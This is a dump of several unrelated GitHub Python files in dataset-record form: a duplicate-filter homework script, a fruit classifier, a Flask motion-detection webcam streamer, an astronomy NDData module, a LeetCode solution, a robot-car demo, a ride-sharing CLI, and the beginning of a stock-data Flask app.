p1.vname == p2.vname and p1.nname == p2.nname and p1.city == p2.city and p1.post_code == p2.post_code :\n p_gleich += 1\n if p_gleich > 1 :\n print(f\"DUPLICATE {p2}\")\n people.remove(p2)\n\n for p in people :\n if p.vname == \"\" or p.nname == \"\" or p.city == \"\" or p.post_code == \"\":\n print(f'EMPTY ATTRIBUTES {p}')\n people.remove(p)\n\n\n\n return people \n\n\ndef main() :\n json_data = getJsonFromFile(\"people.json\")\n\n data = json.loads(json_data)\n data = data[\"people\"]\n\n people = []\n for date in data :\n people.append(Person(date[\"v_name\"], date[\"l_name\"], date[\"city\"], date[\"post code\"]))\n # print(people[0])\n\n print(f\"Anzahl d. eingelesenen Personen: {len(people)}\")\n people = checkPeople(people)\n\n print(f\"\\nEndgültige Anzahl d. Personen: {len(people)}\")\n for p in people :\n print(p)\n\nif __name__ == \"__main__\":\n main()","repo_name":"GregGamer/python_homework","sub_path":"Übungsblatt4/U4Bsp3.py","file_name":"U4Bsp3.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19177013790","text":"from sklearn import tree\n\nTEXTURE_BUMPY = 0\nTEXTURE_SMOOTH = 1\n\nLABEL_APPLE = 0\nLABEL_ORANGE = 1\n\nLABELS = {\n LABEL_APPLE: 'apple',\n LABEL_ORANGE: 'orange',\n}\n\n\ndef classify(to_classify):\n features = [\n [90, TEXTURE_BUMPY],\n [140, TEXTURE_SMOOTH],\n [130, TEXTURE_SMOOTH],\n [150, TEXTURE_BUMPY],\n [170, TEXTURE_BUMPY],\n ]\n labels = [\n LABEL_ORANGE,\n LABEL_APPLE,\n LABEL_APPLE,\n LABEL_ORANGE,\n LABEL_ORANGE\n ]\n\n clf = tree.DecisionTreeClassifier()\n clf = clf.fit(features, labels)\n\n return clf.predict(to_classify)\n\n\ndef main():\n to_classify = [\n [160, TEXTURE_BUMPY],\n [145, TEXTURE_BUMPY],\n [120, TEXTURE_SMOOTH],\n [100, TEXTURE_BUMPY],\n ]\n\n decisions = classify(to_classify)\n\n for decision in decisions:\n print(\"It's a(n):\", LABELS[decision])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jwasham/practice-python","sub_path":"machine-learning/fruit-classify.py","file_name":"fruit-classify.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1548,"dataset":"github-code","pt":"48"} +{"seq_id":"7658920827","text":"# USAGE\n# python webstreaming.py --ip 0.0.0.0 --port 8000\n\n# import the necessary packages\nfrom pyimagesearch.motion_detection import SingleMotionDetector\nfrom pyimagesearch.keyclipwriter import KeyClipWriter\nfrom imutils.video import VideoStream\nfrom flask import Response, Flask, render_template, url_for, request\nimport threading\nimport argparse\nimport datetime\nimport imutils\nimport time\nimport cv2\nimport smtplib\nimport os\nimport os.path as op\nimport glob\nfrom email.message import EmailMessage\n\n# initialize the output frame and a lock used to ensure thread-safe\n# exchanges of the output frames (useful for multiple browsers/tabs\n# are viewing tthe stream)\noutputFrame = None\nlock = threading.Lock()\n\n# initialize a flask object\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'cf21ee8a4cee82fa62563445a4c6cdd4'\n\n# initialize the video stream and allow the camera sensor to\n# warmup\n#vs = VideoStream(usePiCamera=1).start()\nvs = VideoStream(src=0)\n\n# initialize last uploaded timestamp and frame motion counter\nlastUploadedEmail = datetime.datetime.now()\nmotionCounter = 0\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n global vs\n power = False # if True, camera is on\n\n if \"Camera On\" in request.form:\n power = True\n vs = VideoStream(src=0).start()\n time.sleep(2.0)\n elif \"Camera Off\" in request.form:\n power = False\n vs.stop()\n\n # return the rendered template\n return render_template(\"home.html\", power=power)\n\n\n@app.route(\"/video_feed\")\ndef video_feed():\n # return the response generated along with the specific media\n # type (mime type)\n return Response(generate(),\n mimetype=\"multipart/x-mixed-replace; boundary=frame\")\n\n\n@app.route(\"/saved_videos\")\ndef saved_videos():\n video_path = \"\"\n if (not(\"/static/videos\" in os.getcwd())):\n video_path = op.abspath('./static/videos')\n os.chdir(video_path)\n\n vid_list = glob.glob('*.mp4')\n vid_list.sort()\n\n return render_template(\"saved_videos.html\", vid_list=vid_list)\n\n\ndef detect_motion(frameCount):\n # grab global references to the video stream, output frame, and\n # lock variables\n global vs, outputFrame, lock\n\n # initialize the motion detector and the total number of frames\n # read thus far\n md = SingleMotionDetector(accumWeight=0.1)\n total = 0\n\n # initialize KeyClipWriter, set counter for frames with no motion detected\n kcw = KeyClipWriter()\n consecFramesNoMotion = 0\n\n # loop over frames from the video stream\n while True:\n timestamp = datetime.datetime.now()\n text = \"Unoccupied\"\n # read the next frame from the video stream, resize it,\n # convert the frame to grayscale, and blur it\n frame = vs.read()\n frame = imutils.resize(frame, width=400)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n # if the total number of frames has reached a sufficient\n # number to construct a reasonable background model, then\n # continue to process the frame\n if total > frameCount:\n # detect motion in the image\n motion = md.detect(gray)\n\n # check to see if motion was found in the frame\n if motion is not None:\n # unpack the tuple and draw the box surrounding the\n # \"motion area\" on the output frame\n (thresh, (minX, minY, maxX, maxY)) = motion\n cv2.rectangle(frame, (minX, minY), (maxX, maxY),\n (0, 0, 255), 2)\n text = \"Occupied\"\n\n # send email to notify user of motion\n # send_email(timestamp)\n\n # motion has occured, so reset frames with no motion counter\n consecFramesNoMotion = 0\n else:\n consecFramesNoMotion += 1\n\n record_video(kcw, frame, motion, consecFramesNoMotion, timestamp)\n\n # grab the current timestamp and draw it on the frame\n cv2.putText(frame, timestamp.strftime(\n \"%A %d %B %Y %I:%M:%S%p\"), (10, frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\n cv2.putText(frame, \"Room Status: {}\".format(text), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n\n # update the background model and increment the total number\n # of frames read thus far\n md.update(gray)\n total += 1\n\n # acquire the lock, set the output frame, and release the\n # lock\n with lock:\n outputFrame = frame.copy()\n\n\ndef generate():\n # grab global references to the output frame and lock variables\n global outputFrame, lock\n\n # loop over frames from the output stream\n while True:\n # wait until the lock is acquired\n with lock:\n # check if the output frame is available, otherwise skip\n # the iteration of the loop\n if outputFrame is None:\n continue\n\n # encode the frame in JPEG format\n (flag, encodedImage) = cv2.imencode(\".jpg\", outputFrame)\n\n # ensure the frame was successfully encoded\n if not flag:\n continue\n\n # yield the output frame in the byte format\n yield(b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n bytearray(encodedImage) + b'\\r\\n')\n\n\ndef send_email(timestamp):\n global motionCounter, lastUploadedEmail\n\n min_send_seconds = 5\n min_motion_frames = 8\n\n # set usernames for email\n # your email here/os.environ.get()\n email_address = ''\n # your password here/os.environ.get()\n password = ''\n contacts = [email_address]\n\n # prepare email message\n msg = EmailMessage()\n msg['From'] = email_address\n msg['To'] = contacts\n msg['Subject'] = 'Motion Detection Alert'\n msg.set_content('Motion detected at ' + str(timestamp))\n\n if (timestamp - lastUploadedEmail).seconds >= min_send_seconds:\n # increment the motion counter\n motionCounter += 1\n # check to see if the number of frames with consistent motion is\n # high enough\n if motionCounter >= min_motion_frames:\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(email_address, password)\n smtp.send_message(msg)\n\n # update the last uploaded timestamp and reset the motion\n # counter\n lastUploadedEmail = timestamp\n motionCounter = 0\n\n # otherwise, the room is not occupied\n else:\n motionCounter = 0\n\n\ndef record_video(kcw, frame, motion, consecFramesNoMotion, timestamp):\n bufferSize = 32\n outputPath = './static/videos'\n codec = 'avc1' # record mp4 video\n fps = 20\n\n if motion:\n # if we are not already recording, start recording\n if not kcw.recording:\n timeDetected = timestamp.strftime(\"%Y%m%d-%H%M%S\")\n p = \"{}/{}.mp4\".format(outputPath, timeDetected)\n kcw.start(p, cv2.VideoWriter_fourcc(*codec), fps)\n\n # update the key frame clip buffer\n kcw.update(frame)\n\n # stop recording video when there are enough frames without motion\n if kcw.recording and consecFramesNoMotion >= bufferSize:\n kcw.finish()\n\n\n# check to see if this is the main thread of execution\nif __name__ == '__main__':\n # construct the argument parser and parse command line arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--ip\", type=str, required=True,\n help=\"ip address of the device\")\n ap.add_argument(\"-o\", \"--port\", type=int, required=True,\n help=\"ephemeral port number of the server (1024 to 65535)\")\n ap.add_argument(\"-f\", \"--frame-count\", type=int, default=32,\n help=\"# of frames used to construct the background model\")\n args = vars(ap.parse_args())\n\n # start a thread that will perform motion detection\n t = threading.Thread(target=detect_motion, args=(\n args[\"frame_count\"],))\n t.daemon = True\n t.start()\n\n # start the flask app\n app.run(host=args[\"ip\"], port=args[\"port\"], debug=True,\n threaded=True, use_reloader=True)\n\n# release the video stream pointer\nvs.stop()\n","repo_name":"FranklinWang2001/RaspiStream-and-Flask","sub_path":"webstreaming.py","file_name":"webstreaming.py","file_ext":"py","file_size_in_byte":8395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42969536543","text":"\"\"\"\nThis module implements a derivative class based on NDData with some Mixins,\nimplementing windowing and on-the-fly data scaling.\n\"\"\"\n\n\nimport warnings\nfrom copy import deepcopy\nfrom functools import reduce\n\nimport numpy as np\n\nfrom astropy.io.fits import ImageHDU\nfrom astropy.modeling import Model, models\nfrom astropy.nddata import (NDArithmeticMixin, NDData, NDSlicingMixin,\n VarianceUncertainty)\nfrom gwcs.wcs import WCS as gWCS\nfrom .wcs import remove_axis_from_frame\n\nINTEGER_TYPES = (int, np.integer)\n\n__all__ = ['NDAstroData']\n\n\nclass ADVarianceUncertainty(VarianceUncertainty):\n \"\"\"\n Subclass VarianceUncertainty to check for negative values.\n \"\"\"\n @VarianceUncertainty.array.setter\n def array(self, value):\n if value is not None and np.any(value < 0):\n warnings.warn(\"Negative variance values found. Setting to zero.\",\n RuntimeWarning)\n value = np.where(value >= 0., value, 0.)\n VarianceUncertainty.array.fset(self, value)\n\n\nclass AstroDataMixin:\n \"\"\"\n A Mixin for ``NDData``-like classes (such as ``Spectrum1D``) to enable\n them to behave similarly to ``AstroData`` objects.\n\n These behaviors are:\n 1. ``mask`` attributes are combined with bitwise, not logical, or,\n since the individual bits are important.\n 2. The WCS must be a ``gwcs.WCS`` object and slicing results in\n the model being modified.\n 3. There is a settable ``variance`` attribute.\n 4. Additional attributes such as OBJMASK can be extracted from\n the .meta['other'] dict\n \"\"\"\n def __getattr__(self, attribute):\n \"\"\"\n Allow access to attributes stored in self.meta['other'], as we do\n with AstroData objects.\n \"\"\"\n if attribute.isupper():\n try:\n return self.meta['other'][attribute]\n except KeyError:\n pass\n raise AttributeError(f\"{self.__class__.__name__!r} object has no \"\n f\"attribute {attribute!r}\")\n\n def _arithmetic(self, operation, operand, propagate_uncertainties=True,\n handle_mask=np.bitwise_or, handle_meta=None,\n uncertainty_correlation=0, compare_wcs='first_found',\n **kwds):\n \"\"\"\n Override the NDData method so that \"bitwise_or\" becomes the default\n operation to combine masks, rather than \"logical_or\"\n \"\"\"\n return super()._arithmetic(\n operation, operand, propagate_uncertainties=propagate_uncertainties,\n handle_mask=handle_mask, handle_meta=handle_meta,\n uncertainty_correlation=uncertainty_correlation,\n compare_wcs=compare_wcs, **kwds)\n\n def _slice_wcs(self, slices):\n \"\"\"\n The ``__call__()`` method of gWCS doesn't appear to conform to the\n APE 14 interface for WCS implementations, and doesn't react to\n slicing properly. We override NDSlicing's method to do what we want.\n \"\"\"\n if not isinstance(self.wcs, gWCS):\n return self.wcs\n\n # Sanitize the slices, catching some errors early\n if not isinstance(slices, (tuple, list)):\n slices = (slices,)\n slices = list(slices)\n ndim = len(self.shape)\n if len(slices) > ndim:\n raise ValueError(f\"Too many dimensions specified in slice {slices}\")\n\n if Ellipsis in slices:\n if slices.count(Ellipsis) > 1:\n raise IndexError(\"Only one ellipsis can be specified in a slice\")\n ell_index = slices.index(Ellipsis)\n slices[ell_index:ell_index+1] = [slice(None)] * (ndim - len(slices) + 1)\n slices.extend([slice(None)] * (ndim-len(slices)))\n\n mods = []\n mapped_axes = []\n for i, (slice_, length) in enumerate(zip(slices[::-1], self.shape)):\n model = []\n if isinstance(slice_, slice):\n if slice_.step and slice_.step > 1:\n raise IndexError(\"Cannot slice with a step\")\n if slice_.start:\n start = length + slice_.start if slice_.start < 1 else slice_.start\n if start > 0:\n model.append(models.Shift(start))\n mapped_axes.append(max(mapped_axes)+1 if mapped_axes else 0)\n elif isinstance(slice_, INTEGER_TYPES):\n model.append(models.Const1D(slice_))\n mapped_axes.append(-1)\n else:\n raise IndexError(\"Slice not an integer or range\")\n if model:\n mods.append(reduce(Model.__or__, model))\n else:\n # If the previous model was an Identity, we can hang this\n # one onto that without needing to append a new Identity\n if i > 0 and isinstance(mods[-1], models.Identity):\n mods[-1] = models.Identity(mods[-1].n_inputs + 1)\n else:\n mods.append(models.Identity(1))\n\n slicing_model = reduce(Model.__and__, mods)\n if mapped_axes != list(np.arange(ndim)):\n slicing_model = models.Mapping(\n tuple(max(ax, 0) for ax in mapped_axes)) | slicing_model\n slicing_model.inverse = models.Mapping(\n tuple(ax for ax in mapped_axes if ax != -1), n_inputs=ndim)\n\n if isinstance(slicing_model, models.Identity) and slicing_model.n_inputs == ndim:\n return self.wcs # Unchanged!\n new_wcs = deepcopy(self.wcs)\n input_frame = new_wcs.input_frame\n for axis, mapped_axis in reversed(list(enumerate(mapped_axes))):\n if mapped_axis == -1:\n input_frame = remove_axis_from_frame(input_frame, axis)\n new_wcs.pipeline[0].frame = input_frame\n new_wcs.insert_transform(new_wcs.input_frame, slicing_model, after=True)\n return new_wcs\n\n @property\n def variance(self):\n \"\"\"\n A convenience property to access the contents of ``uncertainty``.\n \"\"\"\n arr = self.uncertainty\n if arr is not None:\n return arr.array\n\n @variance.setter\n def variance(self, value):\n self.uncertainty = (ADVarianceUncertainty(value) if value is not None\n else None)\n\n @property\n def wcs(self):\n return super().wcs\n\n @wcs.setter\n def wcs(self, value):\n if value is not None and not isinstance(value, gWCS):\n raise TypeError(\"wcs value must be None or a gWCS object\")\n self._wcs = value\n\n @property\n def shape(self):\n return self._data.shape\n\n @property\n def size(self):\n return self._data.size\n\n\nclass FakeArray:\n\n def __init__(self, very_faked):\n self.data = very_faked\n self.shape = (100, 100) # Won't matter. This is just to fool NDData\n self.dtype = np.float32 # Same here\n\n def __getitem__(self, index):\n # FAKE NEWS!\n return None\n\n def __array__(self):\n return self.data\n\n\nclass NDWindowing:\n\n def __init__(self, target):\n self._target = target\n\n def __getitem__(self, slice):\n return NDWindowingAstroData(self._target, window=slice)\n\n\nclass NDWindowingAstroData(AstroDataMixin, NDArithmeticMixin, NDSlicingMixin, NDData):\n \"\"\"\n Allows \"windowed\" access to some properties of an ``NDAstroData`` instance.\n In particular, ``data``, ``uncertainty``, ``variance``, and ``mask`` return\n clipped data.\n \"\"\"\n def __init__(self, target, window):\n self._target = target\n self._window = window\n\n def __getattr__(self, attribute):\n \"\"\"\n Allow access to attributes stored in self.meta['other'], as we do\n with AstroData objects.\n \"\"\"\n if attribute.isupper():\n try:\n return self._target._get_simple(attribute, section=self._window)\n except KeyError:\n pass\n raise AttributeError(f\"{self.__class__.__name__!r} object has no \"\n f\"attribute {attribute!r}\")\n\n @property\n def unit(self):\n return self._target.unit\n\n @property\n def wcs(self):\n return self._target._slice_wcs(self._window)\n\n @property\n def data(self):\n return self._target._get_simple('_data', section=self._window)\n\n @property\n def uncertainty(self):\n return self._target._get_uncertainty(section=self._window)\n\n @property\n def variance(self):\n if self.uncertainty is not None:\n return self.uncertainty.array\n\n @property\n def mask(self):\n return self._target._get_simple('_mask', section=self._window)\n\n\ndef is_lazy(item):\n return isinstance(item, ImageHDU) or (hasattr(item, 'lazy') and item.lazy)\n\n\nclass NDAstroData(AstroDataMixin, NDArithmeticMixin, NDSlicingMixin, NDData):\n \"\"\"\n Implements ``NDData`` with all Mixins, plus some ``AstroData`` specifics.\n\n This class implements an ``NDData``-like container that supports reading\n and writing as implemented in the ``astropy.io.registry`` and also slicing\n (indexing) and simple arithmetics (add, subtract, divide and multiply).\n\n A very important difference between ``NDAstroData`` and ``NDData`` is that\n the former attempts to load all its data lazily. There are also some\n important differences in the interface (eg. ``.data`` lets you reset its\n contents after initialization).\n\n Documentation is provided where our class differs.\n\n See also\n --------\n NDData\n NDArithmeticMixin\n NDSlicingMixin\n\n Examples\n --------\n\n The mixins allow operation that are not possible with ``NDData`` or\n ``NDDataBase``, i.e. simple arithmetics::\n\n >>> from astropy.nddata import StdDevUncertainty\n >>> import numpy as np\n >>> data = np.ones((3,3), dtype=np.float)\n >>> ndd1 = NDAstroData(data, uncertainty=StdDevUncertainty(data))\n >>> ndd2 = NDAstroData(data, uncertainty=StdDevUncertainty(data))\n >>> ndd3 = ndd1.add(ndd2)\n >>> ndd3.data\n array([[2., 2., 2.],\n [2., 2., 2.],\n [2., 2., 2.]])\n >>> ndd3.uncertainty.array\n array([[1.41421356, 1.41421356, 1.41421356],\n [1.41421356, 1.41421356, 1.41421356],\n [1.41421356, 1.41421356, 1.41421356]])\n\n see ``NDArithmeticMixin`` for a complete list of all supported arithmetic\n operations.\n\n But also slicing (indexing) is possible::\n\n >>> ndd4 = ndd3[1,:]\n >>> ndd4.data\n array([2., 2., 2.])\n >>> ndd4.uncertainty.array\n array([1.41421356, 1.41421356, 1.41421356])\n\n See ``NDSlicingMixin`` for a description how slicing works (which\n attributes) are sliced.\n\n \"\"\"\n def __init__(self, data, uncertainty=None, mask=None, wcs=None,\n meta=None, unit=None, copy=False, window=None, variance=None):\n\n if variance is not None:\n if uncertainty is not None:\n raise ValueError()\n uncertainty = ADVarianceUncertainty(variance)\n\n super().__init__(FakeArray(data) if is_lazy(data) else data,\n None if is_lazy(uncertainty) else uncertainty,\n mask, wcs, meta, unit, copy)\n\n if is_lazy(data):\n self.data = data\n if is_lazy(uncertainty):\n self.uncertainty = uncertainty\n\n def __deepcopy__(self, memo):\n new = self.__class__(\n self._data if is_lazy(self._data) else deepcopy(self.data, memo),\n self._uncertainty if is_lazy(self._uncertainty) else None,\n self._mask if is_lazy(self._mask) else deepcopy(self.mask, memo),\n deepcopy(self.wcs, memo), None, self.unit\n )\n new.meta = deepcopy(self.meta, memo)\n # Needed to avoid recursion because of uncertainty's weakref to self\n if not is_lazy(self._uncertainty):\n new.variance = deepcopy(self.variance)\n return new\n\n @property\n def window(self):\n \"\"\"\n Interface to access a section of the data, using lazy access whenever\n possible.\n\n Returns\n --------\n An instance of ``NDWindowing``, which provides ``__getitem__``,\n to allow the use of square brackets when specifying the window.\n Ultimately, an ``NDWindowingAstrodata`` instance is returned.\n\n Examples\n ---------\n\n >>> ad[0].nddata.window[100:200, 100:200] # doctest: +SKIP\n \n\n \"\"\"\n return NDWindowing(self)\n\n def _get_uncertainty(self, section=None):\n \"\"\"Return the ADVarianceUncertainty object, or a slice of it.\"\"\"\n if self._uncertainty is not None:\n if is_lazy(self._uncertainty):\n if section is None:\n self.uncertainty = ADVarianceUncertainty(self._uncertainty.data)\n return self.uncertainty\n else:\n return ADVarianceUncertainty(self._uncertainty[section])\n elif section is not None:\n return self._uncertainty[section]\n else:\n return self._uncertainty\n\n def _get_simple(self, target, section=None):\n \"\"\"Only use 'section' for image-like objects that have the same shape\n as the NDAstroData object; otherwise, return the whole object\"\"\"\n source = getattr(self, target)\n if source is not None:\n if is_lazy(source):\n if section is None:\n ret = np.empty(source.shape, dtype=source.dtype)\n ret[:] = source.data\n setattr(self, target, ret)\n else:\n ret = source[section]\n return ret\n elif hasattr(source, 'shape'):\n if section is None or source.shape != self.shape:\n return np.array(source, copy=False)\n else:\n return np.array(source, copy=False)[section]\n else:\n return source\n\n @property\n def data(self):\n \"\"\"\n An array representing the raw data stored in this instance.\n It implements a setter.\n \"\"\"\n return self._get_simple('_data')\n\n @data.setter\n def data(self, value):\n if value is None:\n raise ValueError(\"Cannot have None as the data value for an NDData object\")\n\n if is_lazy(value):\n self.meta['header'] = value.header\n self._data = value\n\n @property\n def uncertainty(self):\n return self._get_uncertainty()\n\n @uncertainty.setter\n def uncertainty(self, value):\n if value is not None and not is_lazy(value):\n if value._parent_nddata is not None:\n value = value.__class__(value, copy=False)\n value.parent_nddata = self\n self._uncertainty = value\n\n @property\n def mask(self):\n return self._get_simple('_mask')\n\n @mask.setter\n def mask(self, value):\n self._mask = value\n\n @property\n def variance(self):\n \"\"\"\n A convenience property to access the contents of ``uncertainty``,\n squared (as the uncertainty data is stored as standard deviation).\n \"\"\"\n arr = self._get_uncertainty()\n if arr is not None:\n return arr.array\n\n @variance.setter\n def variance(self, value):\n self.uncertainty = (ADVarianceUncertainty(value) if value is not None\n else None)\n\n def set_section(self, section, input):\n \"\"\"\n Sets only a section of the data. This method is meant to prevent\n fragmentation in the Python heap, by reusing the internal structures\n instead of replacing them with new ones.\n\n Args\n -----\n section : ``slice``\n The area that will be replaced\n input : ``NDData``-like instance\n This object needs to implement at least ``data``, ``uncertainty``,\n and ``mask``. Their entire contents will replace the data in the\n area defined by ``section``.\n\n Examples\n ---------\n\n >>> sec = NDData(np.zeros((100,100))) # doctest: +SKIP\n >>> ad[0].nddata.set_section((slice(None,100),slice(None,100)), sec) # doctest: +SKIP\n\n \"\"\"\n self.data[section] = input.data\n if self.uncertainty is not None:\n self.uncertainty.array[section] = input.uncertainty.array\n if self.mask is not None:\n self.mask[section] = input.mask\n\n def __repr__(self):\n if is_lazy(self._data):\n return self.__class__.__name__ + '(Memmapped)'\n else:\n return super().__repr__()\n\n @property\n def T(self):\n return self.transpose()\n\n def transpose(self):\n unc = self.uncertainty\n new_wcs = deepcopy(self.wcs)\n inframe = new_wcs.input_frame\n new_wcs.insert_transform(inframe, models.Mapping(tuple(reversed(range(inframe.naxes)))), after=True)\n return self.__class__(\n self.data.T,\n uncertainty=None if unc is None else unc.__class__(unc.array.T),\n mask=None if self.mask is None else self.mask.T, wcs=new_wcs,\n meta=self.meta, copy=False\n )\n\n def _slice(self, item):\n \"\"\"Additionally slice things like OBJMASK\"\"\"\n kwargs = super()._slice(item)\n if 'other' in kwargs['meta']:\n kwargs['meta'] = deepcopy(self.meta)\n for k, v in kwargs['meta']['other'].items():\n if isinstance(v, np.ndarray) and v.shape == self.shape:\n kwargs['meta']['other'][k] = v[item]\n return kwargs\n","repo_name":"GeminiDRSoftware/DRAGONS","sub_path":"astrodata/nddata.py","file_name":"nddata.py","file_ext":"py","file_size_in_byte":17764,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"43021491204","text":"from collections import defaultdict\nclass Solution:\n def findRepeatedDnaSequences(self, s: str) -> List[str]:\n visited = defaultdict(int)\n res = []\n for i in range(len(s)-9):\n dna = s[i:i+10]\n if visited[dna] == 1:\n res.append(dna)\n visited[dna] += 1\n return res\n ","repo_name":"IvanaGyro/LeetCode-Answer","sub_path":"0187_20190523_002838.py","file_name":"0187_20190523_002838.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40773985591","text":"# RobotCar demo with the NodeMCU shield for ESP8266\n# NodeMCU shield uses the chip L293D, which uses no I2C.\n# Speed motors are PWM-controlled. Separate pins for direction of the motors. \n# D4 controls also blue led (reverse logic), so it lights on when motor B goes backwards,\n\n# Very helpfull was following sites:\n# http://www.rudiswiki.de/wiki/WiFiCar-NodeMCU\n# https://smartarduino.gitbooks.io/user-mannual-for-esp-12e-motor-shield/content/how_to_get_it.html\n\n# 2017-0724 PePo new\nimport machine, bot, time\nimport motor\n\nprint('creating the 2 motors ...')\n# NodeMCU shield interface: http://www.rudiswiki.de/wiki/WiFiCar-NodeMCU\n#ESP12E Dev Kit Control Port:\n__D1 = 5 # GPIO05 motor PWMA -- left motor\n__D3 = 0 # GPIO00 motor dirA\n\n__D2 = 4 # GPIO04 motor PWMB -- right motor\n__D4 = 2 # GPIO02 motor dirB\n__FREQUENCY = 1600 # no idea what the value should be. Also working: 500\n\nleftMotor = motor.Motor(__D1, __D3, __FREQUENCY)\n#print('left motor:', leftMotor)\nprint('left motor - frequency = ', leftMotor.freq())\n\nrightMotor = motor.Motor(__D2, __D4, __FREQUENCY)\n#print('right motor:', rightMotor)\nprint('right motor - frequency = ', rightMotor.freq())\n\nprint('creating robot ...')\nrobot = bot.Robot(leftMotor, rightMotor)\n#print('robot:', robot)\n\ndt = 3 # duration in seconds\nspeed = 1023 # range: 0 .. 1023, effectively 600 - 1023\n# According to http://www.rudiswiki.de/wiki/WiFiCar-NodeMCU\n# motor start running if speed > 600 .. 1023\n# motor stops if speed < 300\nprint('robot turns {0}... left'.format(speed))\nrobot.left(speed, dt) #turn left\ntime.sleep(0.3)\n\nprint('robot turns {0}... right '.format(speed))\nrobot.right(speed, dt) # turn right\ntime.sleep(0.3)\n\nprint('robot moves {0}... forwards'.format(speed))\nrobot.forward(speed, dt) #forward\ntime.sleep(0.3)\n\nprint('robot moves {0} ... backwards'.format(speed))\nrobot.backward(speed, dt) #backwards\ntime.sleep(0.3)\n\nprint('robot ... stops')\nrobot.stops() #stops\nprint('done')\n","repo_name":"flashypepo/myMicropython-Examples","sub_path":"robotica/robotcar/nodemcu-motorshield/robot_demo.py","file_name":"robot_demo.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15284920101","text":"import logging\n\nfrom src.db import RidesTable\nfrom src.parameters import Parameters\nfrom src.utils import CMDs, Texts, print_out, convert_db_rows_to_str\n\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.DEBUG)\n\n\ndef retrieve_rides(params: Parameters) -> list:\n ''' Retrieve rides stored in DB.'''\n\n logging.info('Retrieving ride(s).')\n\n result = RidesTable.get_rides(args=params)\n \n return convert_db_rows_to_str(rows=result)\n\n\ndef register_ride(params: Parameters) -> None:\n ''' Register ride in DB.'''\n\n logging.info('Create ride.')\n\n res = RidesTable(\n from_city=params.from_city, \n to_city=params.to_city, \n date=params.from_date, \n num_seats=params.num_seats\n )\n res.commit()\n\n\ndef register_return_trip(params: Parameters) -> bool:\n ''' Register return-ride in DB.'''\n\n logging.info('Create return-trip.')\n\n last_ride = RidesTable.get_last_inserted()\n\n params.from_city = last_ride.to_city\n params.to_city = last_ride.from_city\n params.num_seats = last_ride.num_seats\n\n register_ride(params=params)\n\n\ndef handle_request(req: str):\n ''' Handles user requests.'''\n\n cmd_list = req.split(' ')\n\n cmd = cmd_list[0] # Get the cmd indicator, [S, C, R].\n\n cmd_list.pop(0) # Remove cmd indicator.\n\n args = cmd_list[:] # Make a new list, to reset indexing.\n\n params = Parameters(args=args)\n params.parse()\n\n # Create ride.\n if cmd in CMDs.create_ride:\n \n try:\n register_ride(params=params)\n\n except Exception as e:\n logging.error(\n f'Registering trip failed: {e}'\n )\n\n # Retrieve ride(s).\n elif cmd in CMDs.retrieve_ride:\n\n try:\n res = retrieve_rides(params=params)\n print_out(txt=res)\n \n except Exception as e:\n logging.error(\n f'Retreiving data failed: {e}'\n )\n\n # Create return ride.\n elif cmd in CMDs.create_return_ride:\n\n try:\n register_return_trip(params=params)\n\n except Exception as e:\n logging.error(\n f'Registering return trip failed: {e}'\n )\n\n\ndef wait_input():\n ''' Waiting user input in an infinite loop.'''\n\n val = input('>')\n \n # User quits.\n if val in CMDs.quit:\n print_out(Texts.farewell)\n quit()\n\n # User wants help, so display it.\n elif val in CMDs.help:\n print_out(Texts.help_txt)\n\n # Actual commands start here.\n else:\n\n handle_request(req=val)\n \n \n wait_input() # Start over, might be other requests.\n\n\ndef main():\n\n print(Texts.welcome)\n wait_input()","repo_name":"ByteByBit/go_more_or_less","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74503146705","text":"from flask import Flask, request\nfrom flask_cors import CORS \nimport flask\nimport json\nimport requests\nfrom datetime import datetime, timedelta \nfrom RealtimeDB import RealtimeDB \nimport key_variables\n\ntheDB = RealtimeDB()\nAPI_KEY = key_variables.API_KEY\nyesterday = (datetime.today() - timedelta(days = 1)).strftime('%Y-%m-%d')\ntoday = datetime.today().strftime('%Y-%m-%d')\n\nStocksFirst = Flask(__name__)\nCORS(StocksFirst)\n\n@StocksFirst.route(\"/\", methods=[\"GET\", \"POST\"])\n\ndef data():\n print(\"Data endpoint reached.\")\n print(request.method)\n\n if request.method == \"GET\":\n url = 'https://www.alphavantage.co/query?function=TOP_GAINERS_LOSERS&apikey='+API_KEY\n\n #Check DB if top performer data is there\n # Send data back to landing page\n content = theDB.get_top_performer_data()\n print(content)\n if content == None:\n #Get it from the API and write it to the database\n print(\"Doing API call\")\n api_call = requests.get(url)\n data = api_call.json()\n \n last_updated = data[\"last_updated\"][0:10]\n tmp = list(data[\"top_gainers\"])\n top_gainers = []\n for el in range(0, 4):\n top_gainers.append(tmp[el])\n \n \n content = dict()\n content[last_updated] = top_gainers\n print(content)\n theDB.write_top_performer_data(content)\n\n print(content)\n return flask.Response(response = content, status=200)\n \n if request.method == \"POST\":\n ticker = request.get_json()[\"data\"].upper()\n if '+' in ticker:\n ticker = ticker.replace('+', '')\n #print(ticker)\n\n #Check the DB if we have data already, and if there's anything current.\n 